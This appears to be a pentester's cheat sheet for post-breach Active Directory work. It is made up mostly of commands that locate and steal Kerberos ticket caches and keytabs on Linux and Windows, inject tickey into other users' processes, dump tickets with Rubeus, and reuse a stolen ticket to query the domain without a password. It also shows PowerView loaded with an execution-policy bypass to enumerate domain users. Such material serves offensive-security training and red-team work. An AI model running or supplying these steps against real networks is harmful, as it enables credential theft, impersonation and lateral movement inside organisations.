This section mean you have an access to computer that connected to AD. This mean we assume breach on that computer.
Enumerate Juicy Info
Harvest tickets from Linux
Check type and location of tickets:
grep default_ccache_name /etc/krb5.conf
If none return, default is FILE:/tmp/krb5cc_%{uid}.
In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being KEYRING tickets, you can use tickey to get them:
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
.\Rubeus dump
# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
# Linux cache kerberost ticket
find / -type f -iname "krb5.keytab" 2>/dev/null
find / -type f -iname "krb5cc_*" 2>/dev/null
# Windows cache kerberost ticket
dir "\krb5*.keytab" /s
dir "\krb5cc_*" /s
if you found the krb5cc_* file, just export it to env variable KRB5CCNAME then check with klist
export KRB5CCNAME=/tmp/krb5cc*
klist
# if imported it mean you able to auto logon without password
python3 GetADUsers.py -all -k -no-pass -dc-ip 172.16.x.y <domain>/<username>
PowerView
Import module
powershell -ep bypass
[PS] . .\PowerView.ps1
The Domain Users
Get-NetUser | select cn
# dump the interesting info
Get-NetUser | select cn,lastlogon,logoncount,memberof
